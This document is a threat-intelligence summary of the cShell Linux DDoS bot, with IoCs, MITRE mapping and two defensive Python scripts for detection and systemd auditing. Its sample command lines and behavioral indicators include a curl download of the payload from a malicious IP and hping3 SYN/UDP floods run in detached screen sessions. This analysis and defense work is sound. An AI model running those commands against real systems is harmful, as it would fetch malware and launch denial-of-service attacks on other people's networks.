Full Report
AhnLab SEcurity intelligence Center (ASEC) monitors attacks against poorly managed Linux servers using multiple honeypots. Among the prominent honeypots are SSH services using weak credential information, which are targeted by numerous DDoS and CoinMiner threat actors. ASEC recently identified a new DDoS malware strain targeting Linux servers while monitoring numerous external attacks. The threat […]
Analysis Summary
# Tool/Technique: cShell DDoS Bot
## Overview
cShell is a newly identified DDoS malware strain targeting poorly managed Linux servers, often installed after attackers gain initial access through compromised SSH services. Its primary purpose is to turn the compromised Linux server into a DDoS bot capable of executing various denial-of-service attacks directed by a Command and Control (C2) server. A distinct characteristic is its reliance on legitimate Linux utilities, specifically `screen` and `hping3`, to execute the attacks.
## Technical Details
- Type: Malware (DDoS Bot)
- Platform: Linux
- Capabilities: installed after the operators brute-force weak SSH credentials; downloads its payload (`cARM`) and the `screen` and `hping3` utilities it depends on; persists as a `systemd` service; launches SYN, ACK and UDP floods by running `hping3` inside a detached `screen` session; receives attack commands from a C2 server; updates itself from hardcoded Pastebin URLs.
- First Seen: detected in late 2024 (based on the detection dates mentioned in the source).
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
  - T1078 - Valid Accounts: SSH login with guessed credentials on poorly managed servers.
- **TA0006 - Credential Access**
  - T1110.001 - Brute Force: Password Guessing against exposed SSH services.
- **TA0002 - Execution**
  - T1059.004 - Command and Scripting Interpreter: Unix Shell: package-manager installation commands and the `screen`/`hping3` launch line.
- **TA0003 - Persistence**
  - T1543.002 - Create or Modify System Process: Systemd Service: `sshell.service` registered and enabled via `systemctl`.
- **TA0011 - Command and Control**
  - T1105 - Ingress Tool Transfer: `curl` downloads of `cARM`, `sshell.service` and the `hping3`/`screen` packages, plus self-updates fetched from Pastebin.
  - T1071.001 - Application Layer Protocol: Web Protocols: HTTP used for the downloads and, per the source, for receiving commands from the C2.
- **TA0040 - Impact**
  - T1498.001 - Network Denial of Service: Direct Network Flood: `hping3` SYN, ACK and UDP floods (`--flood`) run from a detached `screen` session. Both binaries are legitimate, installed system tools; the abuse is of their function, not a proxy-execution bypass.
## Functionality
### Core Capabilities
- **Initial Compromise:** The operators scan for exposed SSH services and brute-force weak credentials; cShell is installed on the hosts they gain access to.
- **Installation:** Installs `curl`, then the attack tools `hping3` and `screen`, choosing the package manager (`apt`, `yum`, etc.) by Linux distribution, and downloads the payload file `cARM`. The installation routine's error messages are written in German.
- **Persistence:** Places the payload at `/etc/de/cARM` and installs a matching `sshell.service` unit, registered and enabled through `systemctl` so the bot restarts with the system.
- **DDoS Execution:** Runs `hping3` inside a detached `screen` session named `concurrent` (`screen -dmS concurrent hping3 ...`).
### Advanced Features
- **Utility Abuse:** The core method involves abusing legitimate Linux tools:
- **`screen`:** Starts `hping3` detached in a named session (`-d -m -S`, combined as `-dmS concurrent`) so the flood keeps running after the launching process or SSH session ends.
- **`hping3`:** Used to generate and transmit various malicious packets (TCP SYN, ACK, UDP) at maximum speed (`--flood`).
- **Dynamic Updates:** Supports an `UPDATE` command from C2. It checks up to four hardcoded Pastebin links to download the latest version of cShell using `curl`.
- **C2 Interaction:** Listens for commands from the C2, responding with "1" in an idle state. DDoS commands are received and parsed as 5 space-separated strings (command, target IP, target port, screen timeout, data size).
## Indicators of Compromise
- File Hashes:
- MD5: `29d6ef7365c18d243163a648fa6cd697`, `cd8bf4ce178ef5ddac77933d03ffb381`
- File Names:
- `/etc/de/cARM` (Malware payload installation path)
- `sshell.service` (Persistence service file)
- Registry Keys: Not applicable (Linux system service file used)
- Network Indicators:
- Download URLs (payload and service unit): `http[:]//51[.]81[.]121[.]129/cARM`, `http[:]//51[.]81[.]121[.]129/sshell[.]service`
- IP Addresses: `195[.]178[.]110[.]6`, `45[.]148[.]10[.]176`, `45[.]148[.]10[.]203`, `45[.]148[.]10[.]46`, `51[.]81[.]121[.]129`
- Update URLs (Pastebin; three of the four hardcoded links are listed in the source): `https[:]//pastebin[.]com/raw/2AhnDGts`, `https[:]//pastebin[.]com/raw/7beUg9vK`, `https[:]//pastebin[.]com/raw/8kGSNMFr`
- Behavioral Indicators:
- Execution of `apt -y install curl && apt -y install hping3 && apt -y install screen`.
- Use of `screen -dmS concurrent hping3 ... --flood` to launch attacks that survive the operator's session.
- Use of `systemctl enable sshell.service`.
## Associated Threat Actors
- Not attributed to a named group. The source describes the operators generally as the "DDoS and CoinMiner threat actors" that target poorly managed Linux SSH servers for botnet recruitment. Strings in the source code ("Test") suggest cShell is an early version.
## Detection Methods
- Signature-based detection: Detection names include `Trojan/Linux.Cshell.7736270` and `Trojan/Script.Agent`.
- Behavioral detection: Alert on installation of `hping3` and `screen` shortly before a new `systemd` service is created or enabled, on any `hping3` invocation carrying `--flood` inside a detached `screen` session, and on `curl` requests to the listed download host or Pastebin raw URLs.
- YARA rules: Not provided in the source. Rules could key on the strings the report does give (the `sshell.service` name, the `/etc/de/cARM` path, the `concurrent` session name, the Pastebin raw URLs) or on residual Go symbol names in the binary.
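The behavioral indicators above can be checked mechanically. The following is an added example, not ASEC's code and not part of the malware: it scans a list of process command lines (for instance decoded auditd `EXECVE` records or a recovered shell history) for the tool installation, the `sshell.service` persistence step, downloads from the listed infrastructure, and `hping3` floods launched in a detached `screen` session, and pulls the target, port, mode and payload size out of the `hping3` line so an analyst can see what the bot was told to attack. The sample command lines are constructed for this example (the target is a TEST-NET-3 address), and the rule names and severities are this example's own choices.

```python
"""Behavioural triage for cShell-style activity on a Linux host (added example)."""
import re
from dataclasses import dataclass

# Network indicators copied from the IoC section of this report.
KNOWN_HOSTS = ("51.81.121.129", "195.178.110.6", "45.148.10.176",
               "45.148.10.203", "45.148.10.46")
PASTEBIN_IDS = ("2AhnDGts", "7beUg9vK", "8kGSNMFr")

INSTALL_RE = re.compile(
    r"\b(?:apt(?:-get)?|yum|dnf)\b\s+(?:-y\s+)?install\b.*\b(hping3|screen)\b")
PERSIST_RE = re.compile(
    r"systemctl\s+(?:enable|start|daemon-reload)\b.*\bsshell\.service\b"
    r"|/etc/de/cARM|\bsshell\.service\b")
# screen -dmS <session> hping3 ... : detached, named session wrapping hping3
SCREEN_HPING_RE = re.compile(
    r"\bscreen\b.*?-dmS\s+(?P<session>\S+)\s+(?P<cmd>hping3\b.*)")

# Real hping3 options: -S/-A set TCP flags, -2/--udp selects UDP mode,
# --flood sends as fast as possible; VALUE_OPTS consume the next token.
HPING_MODE = {"-S": "SYN", "-A": "ACK", "-2": "UDP", "--udp": "UDP"}
VALUE_OPTS = {"-p", "--destport", "-d", "--data", "-c", "--count",
              "-i", "--interval", "-a", "--spoof", "-s", "--baseport"}


@dataclass
class Finding:
    rule: str       # example's own rule names
    severity: str
    detail: str
    line: str


def parse_hping(cmd: str) -> dict:
    """Extract target, port, payload size, mode and flood flag from an hping3 command."""
    toks = cmd.split()
    info = {"target": None, "port": None, "data": None, "mode": "TCP", "flood": False}
    i = 1  # toks[0] is "hping3"
    while i < len(toks):
        t = toks[i]
        if t == "--flood":
            info["flood"] = True
        elif t in HPING_MODE:
            info["mode"] = HPING_MODE[t]
        elif t in VALUE_OPTS:
            i += 1
            if i < len(toks):
                if t in ("-p", "--destport"):
                    info["port"] = toks[i]
                elif t in ("-d", "--data"):
                    info["data"] = toks[i]
        elif not t.startswith("-") and info["target"] is None:
            info["target"] = t  # first bare argument is the destination host
        i += 1
    return info


def scan(cmdlines) -> list:
    """Return one Finding per matched indicator, in input order."""
    findings = []
    for line in cmdlines:
        m = SCREEN_HPING_RE.search(line)
        if m:
            info = parse_hping(m.group("cmd"))
            findings.append(Finding(
                "hping3_in_detached_screen",
                "high" if info["flood"] else "medium",
                f"session={m.group('session')} mode={info['mode']} "
                f"target={info['target']} port={info['port']} data={info['data']}",
                line))
            continue
        m = INSTALL_RE.search(line)
        if m:
            findings.append(Finding("attack_tool_install", "medium", m.group(1), line))
        m = PERSIST_RE.search(line)
        if m:
            findings.append(Finding("cshell_persistence", "high", m.group(0), line))
        host = next((h for h in KNOWN_HOSTS if h in line), None)
        paste = next((p for p in PASTEBIN_IDS if f"pastebin.com/raw/{p}" in line), None)
        if host or paste:
            findings.append(Finding("known_infrastructure", "high",
                                    host or f"pastebin:{paste}", line))
    return findings


# Constructed sample command lines for this example, not a real capture.
# The first five mirror the behavioural indicators listed in the report.
SAMPLE_CMDLINES = [
    "apt -y install curl && apt -y install hping3 && apt -y install screen",
    "curl -o /etc/de/cARM http://51.81.121.129/cARM",
    "systemctl enable sshell.service",
    "screen -dmS concurrent hping3 -S 203.0.113.10 -p 80 -d 1024 --flood",
    "screen -dmS concurrent hping3 --udp 203.0.113.10 -p 53 --flood",
    "screen -dmS backup rsync -a /srv /mnt/backup",   # benign screen use
    "ls -la /etc/systemd/system",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_CMDLINES):
        print(f"[{f.severity:6}] {f.rule:26} {f.detail}  <- {f.line}")
```

The `screen` rule deliberately requires `hping3` as the wrapped command, so ordinary detached `screen` sessions (the `rsync` line) produce no alert; a `curl` to the download host trips both the path and the infrastructure rules, which is the intended redundancy for a line that carries two indicators.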
## Mitigation Strategies
- **Prevention:** Use strong, unique passwords for every SSH account, or better, public-key authentication with `PasswordAuthentication no`; enforce multi-factor authentication where possible and disable root login over SSH.
- **Hardening:** Restrict access to the SSH port (22) at the firewall to trusted source addresses where feasible, rate-limit or block repeated failed logins, and keep the Linux OS patched so that brute-forcing is not supplemented by exploitation of known vulnerabilities.
- **System Integrity:** Regularly audit `systemd` unit files and running processes for unexpected background tasks, in particular legitimate tools such as `hping3` or `screen` started by a service or left running detached. Check for unknown files in sensitive directories such as `/etc/`, including the `/etc/de/` path used here.
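The unit-file audit above is the kind of check that is easy to script. The following is an added example, not ASEC's code: it parses every `.service` file in a unit directory, extracts `ExecStart`, and flags units that carry the `sshell.service` name or point under `/etc/de/`, whose binary lives outside the usual system prefixes, whose binary is missing from disk, or whose binary hashes to one of the MD5s listed in the IoC section. The `root` parameter lets it run against a constructed tree, which is what the demo does; the contents of the constructed `sshell.service` are an assumption, since the report does not reproduce the real unit file, and the trusted-prefix list is this example's own policy.

```python
"""Audit systemd unit files for cShell-style persistence (added example)."""
import hashlib
import os
import tempfile

# Example policy: where ExecStart binaries of legitimate units normally live.
TRUSTED_PREFIXES = ("/usr/bin/", "/usr/sbin/", "/usr/lib/", "/usr/libexec/",
                    "/bin/", "/sbin/", "/lib/", "/usr/local/bin/",
                    "/usr/local/sbin/", "/opt/")
# File hashes from the IoC section of this report.
KNOWN_MD5 = {"29d6ef7365c18d243163a648fa6cd697",
             "cd8bf4ce178ef5ddac77933d03ffb381"}


def parse_execstart(unit_text: str) -> list:
    """Minimal unit-file parser: all ExecStart values in the [Service] section."""
    section, execs = None, []
    for raw in unit_text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if section == "Service" and "=" in line:
            key, value = line.split("=", 1)
            if key.strip() == "ExecStart":
                execs.append(value.strip())
    return execs


def exec_binary(execstart: str) -> str:
    """First word of ExecStart without systemd's prefix characters (-, @, +, !, :)."""
    parts = execstart.split()
    return parts[0].lstrip("-@+!:") if parts else ""


def audit_units(unit_dir: str, root: str = "/") -> list:
    """Return (unit name, binary, [reasons]) for each suspicious .service file."""
    findings = []
    for name in sorted(os.listdir(unit_dir)):
        if not name.endswith(".service"):
            continue
        with open(os.path.join(unit_dir, name)) as fh:
            execs = parse_execstart(fh.read())
        for ex in execs:
            binary = exec_binary(ex)
            reasons = []
            if name == "sshell.service" or binary.startswith("/etc/de/"):
                reasons.append("matches cShell IoC (sshell.service or /etc/de/)")
            if binary.startswith("/") and not binary.startswith(TRUSTED_PREFIXES):
                reasons.append(f"ExecStart outside trusted prefixes: {binary}")
            on_disk = os.path.join(root, binary.lstrip("/"))
            if binary.startswith("/") and not os.path.isfile(on_disk):
                reasons.append("ExecStart binary missing on disk")
            elif binary.startswith("/"):
                with open(on_disk, "rb") as fh:
                    digest = hashlib.md5(fh.read()).hexdigest()
                if digest in KNOWN_MD5:
                    reasons.append(f"binary MD5 {digest} is in the IoC list")
            if reasons:
                findings.append((name, binary, reasons))
    return findings


def build_demo_tree() -> tuple:
    """Constructed tree for this example: a benign sshd unit plus a cShell-style
    unit. The sshell.service text is an assumption, not the real unit file."""
    root = tempfile.mkdtemp(prefix="cshell-audit-")
    unit_dir = os.path.join(root, "etc/systemd/system")
    os.makedirs(unit_dir)
    os.makedirs(os.path.join(root, "usr/sbin"))
    os.makedirs(os.path.join(root, "etc/de"))
    with open(os.path.join(root, "usr/sbin/sshd"), "wb") as fh:
        fh.write(b"#!/bin/sh\n")  # stand-in for the real daemon
    with open(os.path.join(root, "etc/de/cARM"), "wb") as fh:
        fh.write(b"placeholder, not the real payload\n")
    with open(os.path.join(unit_dir, "sshd.service"), "w") as fh:
        fh.write("[Unit]\nDescription=OpenSSH server\n[Service]\n"
                 "ExecStart=/usr/sbin/sshd -D\n[Install]\nWantedBy=multi-user.target\n")
    with open(os.path.join(unit_dir, "sshell.service"), "w") as fh:
        fh.write("[Unit]\nDescription=sshell\n[Service]\nExecStart=/etc/de/cARM\n"
                 "Restart=always\n[Install]\nWantedBy=multi-user.target\n")
    return unit_dir, root


if __name__ == "__main__":
    unit_dir, root = build_demo_tree()
    for name, binary, reasons in audit_units(unit_dir, root):
        print(f"{name}: {binary}\n  - " + "\n  - ".join(reasons))
```

Run against a live host with `audit_units("/etc/systemd/system")` (and `/run/systemd/system`, `~/.config/systemd/user` for user units). The hash check only confirms the two samples in the report; a unit whose binary sits under `/etc/` or another non-standard prefix deserves inspection whether or not the hash matches, since the prefix rule is what catches an updated build.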
## Related Tools/Techniques
- **cARM:** The file name under which the cShell payload is downloaded from the listed host and installed at `/etc/de/cARM`, where `sshell.service` runs it.
- **CoinMiner:** Mentioned generally as the other class of threat actor targeting the same poorly managed SSH servers.
- **hping3:** A legitimate packet-crafting tool abused to generate the SYN, ACK and UDP floods (TA0040 Impact, T1498.001).
- **screen:** A legitimate terminal multiplexer abused to keep `hping3` running detached after the launching session ends (TA0040 Impact, T1498.001).